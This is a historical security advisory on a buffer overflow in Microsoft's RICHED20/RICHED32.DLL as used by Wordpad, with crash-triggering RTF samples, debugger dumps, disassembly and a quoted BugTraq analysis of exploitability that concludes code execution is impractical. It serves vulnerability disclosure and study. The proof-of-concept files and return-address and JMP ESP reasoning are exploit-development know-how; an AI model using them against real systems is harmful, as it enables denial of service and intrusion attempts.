RICHED20.DLL Buffer Overflow
Reported November 20, 1999 by
Pauli Ojanpera
VERSIONS AFFECTED
  • Microsoft's RICHED20.DLL (as used by Wordpad)

DESCRIPTION

Windows 9x and NT ship with a built-in word processor, Wordpad, which relies on RICHED20.DLL. The DLL has an overflow condition, triggered when viewing Rich Text Format (.RTF) files, that can cause Wordpad to crash. However, the vulnerability does not appear to offer a means of executing arbitrary code.

DEMONSTRATION

If a file called crashme.rtf contains the following, Wordpad will crash:
{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

USSRLabs commented on this problem, stating that they see no way to exploit it. In support of that assertion, USSRLabs said that the filtering in riched20.dll only accepts the letters "a" to "z" and "A" to "Z", which restricts the return address (EIP) that can be written to values built from the bytes 61 to 7A, i.e. somewhere between 61616161 and 7A7A7A7A.

USSRLabs also said,

"I found one trick to get one, 0061616, if you put something like this in the rtf file:

00000000: 7B 5C 72 74-66 31 5C 61-61 61 61 61-61 61 61 61 {\rtf1\aaaaaaaaa
00000010: 61 61 61 61-61 61 61 61-61 61 61 61-61 61 61 61 aaaaaaaaaaaaaaaa
00000020: 61 61 61 61-61 61 61 61-61 61 61 61-61 61 69 69 aaaaaaaaaaaaaaii
00000030: 69 00 69 69-69 5C 61 6E-73 69 63 70-67 31 32 35 i iii\ansicpg125
00000040: 32 5C 64 65-66 66 30 5C-64 65 66 6C-61 6E 67 31 2\deff0\deflang1

At offset 00000031, in the "i iii", the zero is a non-accepted character; the filter of riched20.dll cuts it, and the story ends. In the overflow area it appears like this:

69 69 00 48

and the EIP is: EIP=48006969

You can change the file with bad characters ("the filter cuts it") and maybe you can get one, an EIP like 00616161 (I did it). But anyway, you have to think about another point: you are in the code segment, CS. Even if you can get a good EIP, you can only return into the code segment of riched20.dll, and if you search the complete range of code/data of riched20.dll, there is nothing like our "aaaaaiii". The story ends there...." - end quote.
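
The bytes 69 69 00 48 turn into EIP=48006969 because x86 stores 32-bit values little-endian: the byte at the lowest address becomes the least significant byte. A minimal Python illustration, using only the four bytes from the quote above:

```python
# The four bytes found in the overflow area, lowest address first.
overflow_bytes = bytes([0x69, 0x69, 0x00, 0x48])

# x86 loads 32-bit values little-endian: the first byte is the least significant.
eip = int.from_bytes(overflow_bytes, "little")
print(f"EIP={eip:08X}")  # prints EIP=48006969
```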

A user known as Solar Eclipse provides extensive details and debugging information regarding this issue:

Quoting from the message as posted on BugTraq (with minor edits to replace profanity):

I. Introduction

The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>

    Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
    overflow problem with ".rtf"-files.

    Crashme.rtf :
    \{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\}

    A malicious document could probably abuse this to execute arbitrary
    code. WordPad crashes with EIP=41414141.

Thomas Dullien <dullien@GMX.DE> did some very good research on this
buffer overflow. Unfortunately I received his vuln-dev post after I
was deep into the Wordpad code, so I already discovered most of the
details that he posted.

II. Research

Ok, let's try to exploit this stuff. First, try to crash Wordpad.
Create the following file:

{\rtf\AAAAAAAAAA(100 "A"s)}

I am using SoftICE to inspect the situation after the crash.
First, take a look at the registers and the stack.

EIP=61616161
ESP=0012F044
EBP=61616161
ebp eip
0023:0012F024 0012F104 00000102 61616161 61616161 ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023 ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000 aaaaaaaa........

We can assume that EBP was popped from the stack and then a RET 10 instruction was executed, which popped EIP and then increased the stack pointer by a further 10h bytes.

To check if this is the case, try the following:

{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}

Wordpad crashes again. The registers and the stack are as follows:

ESP=0012F054
EBP=6A6A6A6A "jjjj"
EIP=6B6B6B6B "kkkk"

ebp eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023 ....F...D...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373 ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777 ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200 xxxxyyyyzzzz....

Yes, our assumption was correct. EBP gets its value from 0012F03C, and the RET 10 instruction gets the EIP from 0012F040.
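
The ESP values in both crashes fit this reading. Assuming the epilogue was POP EBP followed by RET 10 (an inference from the dumps, not something visible in a disassembly yet), ESP ends up 4 + 4 + 10h bytes above the slot that held the saved EBP. A small Python check of that arithmetic (the helper name is hypothetical):

```python
def esp_after_pop_ebp_ret(saved_ebp_slot: int, ret_imm: int) -> int:
    """Return ESP after `pop ebp; ret imm`, starting with ESP at the saved-EBP slot.

    pop ebp  -> ESP += 4
    ret imm  -> pop EIP (ESP += 4), then discard imm bytes of arguments
    """
    return saved_ebp_slot + 4 + 4 + ret_imm

# Saved-EBP slots read from the two stack dumps (the "ebp" column).
first = esp_after_pop_ebp_ret(0x0012F02C, 0x10)
second = esp_after_pop_ebp_ret(0x0012F03C, 0x10)
print(f"{first:08X} {second:08X}")  # prints 0012F044 0012F054
```

Both results match the ESP values SoftICE reported after the two crashes.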

The buffer is probably 36 characters big, because "jjjj", the group that follows the first 36 characters (AAAA through IIII), overwrites the saved EBP.
By the way, notice that the characters are lowercased. This means that the string is converted to lowercase before the crash.
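
Because every letter in the test string is repeated four times, a register value from the crash maps straight back to a position in the input. A small Python helper (the names `pattern` and `offset_of` are hypothetical) that inverts the AAAA...ZZZZ pattern, taking the lowercasing into account:

```python
import string

def pattern() -> str:
    """The test string used above: AAAABBBB...ZZZZ, each letter four times."""
    return "".join(c * 4 for c in string.ascii_uppercase)

def offset_of(register_value: int) -> int:
    """Offset in pattern() of the group that ended up in a register.

    The copy loop lowercases letters, so "JJJJ" shows up as 6A6A6A6A.
    """
    raw = register_value.to_bytes(4, "little")
    if len(set(raw)) != 1 or not (0x61 <= raw[0] <= 0x7A):
        raise ValueError("not a single lowercased group from the pattern")
    return (raw[0] - ord("a")) * 4

p = pattern()
ebp_off = offset_of(0x6A6A6A6A)  # EBP in the second crash
eip_off = offset_of(0x6B6B6B6B)  # EIP in the second crash
print(ebp_off, p[ebp_off:ebp_off + 4])  # prints 36 JJJJ
print(eip_off, p[eip_off:eip_off + 4])  # prints 40 KKKK
```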

Let's try the following file (36 characters):

{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}

It shouldn't crash, but it does. This is strange. Take a look at the registers and the stack (btw, do a quick check with 35 characters: Wordpad will not crash):

EIP=002E0033
ESP=0012F108
EBP=00200067

0023:0012F0E8 0012F294 6E002F02 00200067 002E0033 ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023 ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073 .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000 .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000 ................
0023:0012F138 0012F194 5F816876 00000014 00000000 ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064 ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850 ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168 .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8 .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC :[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8 xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....

This is even more strange. The EBP and EIP are not overwritten by our
string, but they are still smashed.

It's time to find exactly which code is guilty of this mess. Notice that the EIP is overwritten, so we don't know what code was executed before the crash. Pauli Ojanpera posted that the crash was in riched20.dll. Check the loaded DLLs: there is no riched20.dll, but we see riched32.dll. This sounds good! At what address is this DLL loaded?

:map32 riched32
Owner Obj Name Obj# Address Size Type
RICHED32 .text 0001 001B:6C001000 00027284 CODE RO

The code is loaded at 6C001000. Where is the buffer overflow? It is probably located in some function in RICHED32.DLL. This function is probably called from some other function, which is also called from somewhere. We should be able to see the return addresses for these previous calls on the stack. Let's search for something that looks like a return address. At 0012F1D0 we see the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn't it? Go disassemble the thing!
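
"Looks like an address in RICHED32.DLL" is a range check against the .text section reported by :map32 (start 6C001000, size 27284h). A minimal Python sketch that applies it to the four dwords of the stack row at 0012F1C8 (the function name is hypothetical):

```python
TEXT_START = 0x6C001000  # RICHED32 .text start, from :map32
TEXT_SIZE = 0x00027284   # RICHED32 .text size, from :map32

def in_riched32_text(value: int) -> bool:
    """True if value points into RICHED32's code section."""
    return TEXT_START <= value < TEXT_START + TEXT_SIZE

# The stack row at 0012F1C8 from the dump above: address -> dword.
row = {
    0x0012F1C8: 0x7D696969,
    0x0012F1CC: 0x0012F1E0,
    0x0012F1D0: 0x6C026B81,
    0x0012F1D4: 0x0012F290,
}
candidates = [addr for addr, value in row.items() if in_riched32_text(value)]
for addr in candidates:
    print(f"{addr:08X}: {row[addr]:08X}")  # prints 0012F1D0: 6C026B81
```

A debugger session does the same thing by eye; the check only narrows the search, since data that happens to fall in the code range would also match.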

It is part of a function starting at 6C026B0B and ending at 6C026B68 (I included some more code in the middle; more about it later):

001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mov ecx, esi
001B:6C026B7C call 6C0267D1 ; this is called for each \ tag
001B:6C026B81 mov [edi], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret

Put a breakpoint in the beginning of this function and see what happens. The 6C026B0B function is called 2 times and crashes the second time. Trace it step by step, stepping over the calls. The function crashes after the final RET instruction (located at 6C026B68)

Just before the crash the stack looks like this:

edi esi local_var old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0 <- ret address

The POP EDI and POP ESI instructions restore these two registers (look at the disassembly). Then the function restores ESP (which was saved in EBP at the beginning of the function). Trying this with a normal RTF file (one that does not cause a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP is popped from the stack (it becomes 0012F40C) and the RET instruction returns the execution flow to 6C024DE0.

This is not the case with a messed up RTF file. Everything is ok until we hit the MOV ESP, EBP instruction. The value in the EBP register is not correct, thus screwing up the ESP and causing a mess.

Ok, now we need to find where in the 6C026B0B function the EBP is smashed. Put a breakpoint at the beginning of the function and trace it (without stepping into the calls). The EBP at the beginning of the function is 0012F1E0. It changes after the CALL 6C0267D1 instruction.

Now we have the function that changes the EBP.

001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...

The stack of this function looks like this:

0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
ebp eip

At 0012F1D0 we have the return address. The EBP is saved at 0012F1CC, and
then the stack pointer is decremented by 24h (36) bytes, leaving space for 36 bytes of local variables. Remember this number? This is our buffer!
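
The layout follows from the prologue. Reading the dump, the caller's EBP (0012F1E0) is saved at 0012F1CC, so after PUSH EBP / MOV EBP, ESP the frame pointer is 0012F1CC, and SUB ESP, 24 (a hex operand) reserves 24h = 36 bytes below it. A Python sketch of that arithmetic, taking 0012F1CC from the dump as an assumption:

```python
EBP = 0x0012F1CC  # frame pointer of 6C0267D1 (address of the saved EBP, per the dump)
LOCALS = 0x24     # "sub esp, 24": the operand is hex, i.e. 36 bytes

buffer_start = EBP - LOCALS  # lowest byte of the local area
buffer_end = EBP - 1         # highest byte of the local area
saved_ebp_slot = EBP         # written by "push ebp"
return_slot = EBP + 4        # written by the CALL instruction

print(f"locals {buffer_start:08X}-{buffer_end:08X}, "
      f"saved EBP {saved_ebp_slot:08X}, return {return_slot:08X}")
# prints: locals 0012F1A8-0012F1CB, saved EBP 0012F1CC, return 0012F1D0
```

The computed start, 0012F1A8, is exactly where the "aaaa" of our string appears in the dump.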

After some more tracing, we see that the saved EBP is changed by
001B:6C0268E9 mov byte ptr [ebx], 00
which is executed right after the buffer is filled with our characters. This is the NULL termination of the string, and it changes the saved EBP from 0012F1E0 to 0012F100.
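
This is an off-by-one write of the terminating zero: with 36 characters the NULL lands on the lowest (little-endian) byte of the saved EBP. A minimal Python model of just the local area and the saved-EBP slot (a simplification: it ignores the character variable that the real loop keeps inside the local area; the function name is hypothetical):

```python
import struct

BUF_START = 0x0012F1A8       # start of the local area in 6C0267D1
SAVED_EBP_SLOT = 0x0012F1CC  # where "push ebp" stored the caller's EBP
CALLER_EBP = 0x0012F1E0      # the caller's frame pointer

def saved_ebp_after_copy(n_chars: int) -> int:
    """Copy n_chars letters with no length check, NULL-terminate, reread saved EBP."""
    stack = bytearray(SAVED_EBP_SLOT + 4 - BUF_START)
    struct.pack_into("<I", stack, SAVED_EBP_SLOT - BUF_START, CALLER_EBP)
    for i in range(n_chars):
        stack[i] = ord("a")  # raises IndexError if we run past the modelled area
    stack[n_chars] = 0       # the "mov byte ptr [ebx], 00" terminator
    return struct.unpack_from("<I", stack, SAVED_EBP_SLOT - BUF_START)[0]

for n in (35, 36):
    print(n, f"{saved_ebp_after_copy(n):08X}")
# prints:
# 35 0012F1E0
# 36 0012F100
```

When the caller later executes MOV ESP, EBP, ESP becomes 0012F100 instead of 0012F1E0, 0E0h (224) bytes lower on the stack, and the following POP EBP and RET read whatever happens to be stored there.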

Let's do some more reverse engineering. From 6C0268AE to 6C0268DB we have a loop that reads our string and copies it into the buffer.

001B:6C0268AE mov al, [ecx] ; get the current char
001B:6C0268B0 inc ecx ; ecx points to the next char
001B:6C0268B1 mov [ebp-01], al ; store the current char at 0012F1CB
001B:6C0268B4 mov [esi+1C], ecx ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001 ; what the heck?
001B:6C0268BC test eax, eax
001B:6C0268BE jc 6C0268E9 ; this jump is never taken
001B:6C0268C0 movzx eax, byte ptr [ebp-01] ; get the current char
001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01 ; is it "A"-"Z" or "a"-"z"?
001B:6C0268CB jz 6C0268E9 ; no -> go there
001B:6C0268CD mov al, [ebp-01] ; get the current char
001B:6C0268D0 or al, 20 ; make it lowercase
001B:6C0268D2 mov [ebx], al ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, [esi+1C] ; restore ecx
001B:6C0268D8 cmp [esi+18], ecx ; reached the end of the string?
001B:6C0268DB jnz 6C0268AE ; no -> loop again

ECX is a pointer to the memory location where the RTF file is loaded. It
points to the character that we are currently copying. EBX points to the
buffer. The buffer starts at 0012F1A8.
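
Put together, the loop behaves roughly like the following Python model. It is a simplification under stated assumptions: it walks a byte string instead of ECX/EBX pointers, it replaces the table lookup at 6C00C6B8 with a plain letter range check (equivalent for the table values shown later in this message), and the name `riched_copy` is hypothetical. Note that nothing limits the number of bytes written to the destination:

```python
def riched_copy(src: bytes) -> bytes:
    """Model of the loop at 6C0268AE-6C0268DB plus the terminator at 6C0268E9.

    Reads characters until a non-letter or the end of src, stores each letter
    OR 0x20 (lowercase), then appends a NULL. Returns every byte the real code
    would write, starting at the beginning of the destination buffer.
    """
    out = bytearray()
    for ch in src:
        if not (0x41 <= ch <= 0x5A or 0x61 <= ch <= 0x7A):
            break              # non-letter: jump to the NULL terminator
        out.append(ch | 0x20)  # "or al, 20": make it lowercase
    out.append(0)              # "mov byte ptr [ebx], 00"
    return bytes(out)

print(riched_copy(b"AbC}"))                 # prints b'abc\x00'
print(len(riched_copy(b"A" * 36 + b"}")))   # prints 37
```

The second call shows the problem in one line: 36 letters produce 37 written bytes, one more than the 36-byte local area can hold.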

By the way, notice that the current character is stored at [ebp-01] (the third line in the disassembly), i.e. at 0012F1CB, the last byte of the dword shown at 0012F1C8. This means that our buffer is only 32 bytes long, and we have another local variable after it. This doesn't really matter, because the copying process works even if we overwrite this variable (it gets restored). If we put some shellcode there, we need to know that this particular byte will be changed to the first character after the end of the string. In our case, this is "}".

Notice the "test byte ptr \[eax+6C00C6B8\], 01" instruction. At this memory location (6C00C6B8) we have an array of bytes, corresponding to each ASCII value.

The array at 6C00C6B8
+00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30 06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

The only ASCII characters that pass the JZ condition after the TEST
instruction are the letters "A"-"Z" and "a"-"z" (hex 41-5A and 61-7A). As soon as any other character is reached, copying stops and the buffer is NULL-terminated.
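
The claim can be checked mechanically against the dump. A Python sketch that rebuilds the 256-entry table from the rows above (values only; what the other bits mean is not needed here) and lists the bytes whose entry has bit 0 set, which is what TEST ..., 01 checks:

```python
def build_class_table() -> list[int]:
    """Rebuild the 256-byte table at 6C00C6B8 from the hex dump."""
    table = [0x00] * 256
    for c in range(0x30, 0x3A):  # '0'-'9' -> 06
        table[c] = 0x06
    for first in (0x41, 0x61):   # 'A'-'Z' and 'a'-'z'
        for c in range(first, first + 26):
            table[c] = 0x05 if c < first + 6 else 0x01  # 'A'-'F' -> 05, rest -> 01
    return table

table = build_class_table()
passing = bytes(c for c in range(256) if table[c] & 0x01)  # "test byte ptr [eax+...], 01"
print(passing.decode("ascii"))
# prints ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
```

Digits carry 06, which has bit 0 clear, so they stop the copy just like punctuation does.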

Next we try really taking over the return address.

{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAAA(more As)}

"jjjj" overwrites the saved EBP and the return address becomes "kkkk". After
the overwritten return address, we have more As.

0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 6A6A6A6A 6B6B6B6B 61616161 iii}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000 aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000 ................
0023:0012F2A8 00000000 000C1814 00000000 00000000 ................

At 0012F2AC we have a pointer to the current character in the file buffer. ECX is saved to this location (referenced as esi+1C) before the copying, and restored afterwards. This value is updated after every copied byte. If we overwrite it, it will start pointing to a new memory location. The copy loop will try to read the bytes to copy from there and probably crash. Even if we somehow manage to overwrite this with a valid memory pointer, this will be the last byte copied from our string.

This limits us to 216 "A"s after the "jjjjkkkk".
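
The 216 comes straight from the addresses in the dump: the first byte after "jjjjkkkk" is at 0012F1D4, and the saved source pointer sits at 0012F2AC. In Python:

```python
RETURN_SLOT = 0x0012F1D0   # overwritten by "kkkk"
SRC_PTR_SLOT = 0x0012F2AC  # saved ECX ([esi+1C]): pointer into the file buffer
BUF_START = 0x0012F1A8     # start of the local buffer

room_after_ret = SRC_PTR_SLOT - (RETURN_SLOT + 4)
total_letters = SRC_PTR_SLOT - BUF_START
print(room_after_ret, total_letters)  # prints 216 260
```

That is 36 + 4 + 4 + 216 = 260 letters in total before the copy starts overwriting its own source pointer.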

III. Is an exploit possible ?

Exploiting this buffer overflow will be hard. Maybe not impossible, but very hard. We have only 216 bytes to squeeze our shellcode into, and we can use only 26 characters: the letters from "a" to "z".

Writing shellcode with no NULLs is hard; writing it using only letters is almost impossible.

First, we need some way of pointing the return address to something useful. We cannot point it to the stack, because the stack addresses contain "prohibited" characters. After the RET instruction, ESP points to the second part of our string (the one after "jjjjkkkk"). We need a JMP ESP or CALL ESP instruction. The usual approach is to look at the DLLs loaded at the time of the crash and find one of these instructions at some memory location. Then we can point the return address to this memory location and have it jump back to our shellcode. The problem is that the address of this memory location must consist only of lowercase letters.

c:\>listdlls.exe wordpad

ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com
-----------------------------
WORDPAD.EXE pid: 275
Base Size Version Path
0x029a0000 0x34000 4.00.1381.0096 C:\Program Files\Windows NT\Accessories\wordpad.exe
0x77f60000 0x5e000 4.00.1381.0174 C:\WINNT\System32\ntdll.dll
0x5f800000 0xee000 4.21.0000.7160 C:\WINNT\System32\MFC42u.DLL
0x78000000 0x40000 6.00.8397.0000 C:\WINNT\system32\MSVCRT.dll
0x77f00000 0x5e000 4.00.1381.0178 C:\WINNT\system32\KERNEL32.dll
0x77ed0000 0x2c000 4.00.1381.0115 C:\WINNT\system32\GDI32.dll
0x77e70000 0x54000 4.00.1381.0133 C:\WINNT\system32\USER32.dll
0x77dc0000 0x3f000 4.00.1381.0203 C:\WINNT\system32\ADVAPI32.dll
0x77e10000 0x57000 4.00.1381.0193 C:\WINNT\system32\RPCRT4.dll
0x77d80000 0x32000 4.00.1381.0133 C:\WINNT\system32\comdlg32.dll
0x70970000 0x1a8000 4.72.3110.0006 C:\WINNT\system32\SHELL32.dll
0x70bd0000 0x44000 5.00.2314.1000 C:\WINNT\system32\SHLWAPI.dll
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
0x77b20000 0xb6000 4.00.1381.0190 C:\WINNT\system32\ole32.dll
0x76aa0000 0x6000 4.00.1371.0001 C:\WINNT\System32\INDICDLL.dll
0x77c00000 0x18000 4.00.1381.0027 C:\WINNT\System32\WINSPOOL.DRV
0x775a0000 0x14000 0.02.0000.0000 C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
0x6c000000 0x2e000 4.00.0993.0004 C:\WINNT\System32\RICHED32.dll
0x70400000 0x77000 5.00.2314.1000 C:\WINNT\System32\mlang.dll

These are the loaded DLLs that we can use. The perfect DLL would be the same on Windows 95, 98, 98 SE, NT 4 with all service packs, and Win2K. Unfortunately, such a DLL is just a dream. Our choices are really limited. Looking at the base addresses and sizes, we can eliminate most of the DLLs, because none of the addresses they occupy consists only of letter bytes. This leaves us with only one DLL that we can use:

0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll

We can only use the code at addresses from 71616161 to 71616F7A whose bytes are all letters (the DLL image ends at 71590000 + 87000 = 71617000). After disassembling the DLL and looking at the code in this range, we clearly see that there is no JMP ESP or CALL ESP instruction.
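
The elimination can be reproduced from the ListDLLs output. A Python sketch (module bases and sizes copied from the listing above; the helper name `letter_addresses` is hypothetical) that enumerates every address inside each module whose four bytes are all lowercase letters:

```python
# (base, size) pairs copied from the ListDLLs output above.
MODULES = {
    "wordpad.exe": (0x029A0000, 0x34000),
    "ntdll.dll": (0x77F60000, 0x5E000),
    "MFC42u.DLL": (0x5F800000, 0xEE000),
    "MSVCRT.dll": (0x78000000, 0x40000),
    "KERNEL32.dll": (0x77F00000, 0x5E000),
    "GDI32.dll": (0x77ED0000, 0x2C000),
    "USER32.dll": (0x77E70000, 0x54000),
    "ADVAPI32.dll": (0x77DC0000, 0x3F000),
    "RPCRT4.dll": (0x77E10000, 0x57000),
    "comdlg32.dll": (0x77D80000, 0x32000),
    "SHELL32.dll": (0x70970000, 0x1A8000),
    "SHLWAPI.dll": (0x70BD0000, 0x44000),
    "COMCTL32.dll": (0x71590000, 0x87000),
    "ole32.dll": (0x77B20000, 0xB6000),
    "INDICDLL.dll": (0x76AA0000, 0x6000),
    "WINSPOOL.DRV": (0x77C00000, 0x18000),
    "RASDDUI.DLL": (0x775A0000, 0x14000),
    "RICHED32.dll": (0x6C000000, 0x2E000),
    "mlang.dll": (0x70400000, 0x77000),
}
LETTERS = range(0x61, 0x7B)  # 'a'-'z': the only bytes that survive the filter

def letter_addresses(base: int, size: int) -> list[int]:
    """Addresses in [base, base + size) made only of lowercase-letter bytes."""
    end = base + size
    hits = []
    for byte3 in LETTERS:          # most significant byte
        for byte2 in LETTERS:
            block = (byte3 << 24) | (byte2 << 16)
            if block + 0xFFFF < base or block >= end:
                continue           # this 64 KB block does not overlap the module
            for byte1 in LETTERS:
                for byte0 in LETTERS:
                    addr = block | (byte1 << 8) | byte0
                    if base <= addr < end:
                        hits.append(addr)
    return hits

usable = {name: letter_addresses(b, s) for name, (b, s) in MODULES.items()}
for name, hits in usable.items():
    if hits:
        print(f"{name}: {len(hits)} addresses, {hits[0]:08X}-{hits[-1]:08X}")
# prints: COMCTL32.dll: 390 addresses, 71616161-71616F7A
```

Only COMCTL32.DLL qualifies, and its usable addresses stop at 71616F7A because the image ends at 71617000.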

There is no way to execute the shellcode.

Even if we could do it, making the shellcode do something useful would be a pain in the butt. The restrictions are too harsh.

After the RET instruction, at ESP-50 we have a pointer to the beginning of the buffer where the raw file is loaded. This buffer holds the raw file contents, so we can use NULLs and non-letter characters. Unfortunately, this buffer is in the heap and we cannot execute any code from there. We need to copy the code to the stack first." - end quote.


VENDOR RESPONSE

Microsoft is aware of this problem; however, no vendor comment was available at the time of this writing.

CREDITS
Discovered by
Pauli Ojanpera
Posted here at NTSecurity.net on November 20, 1999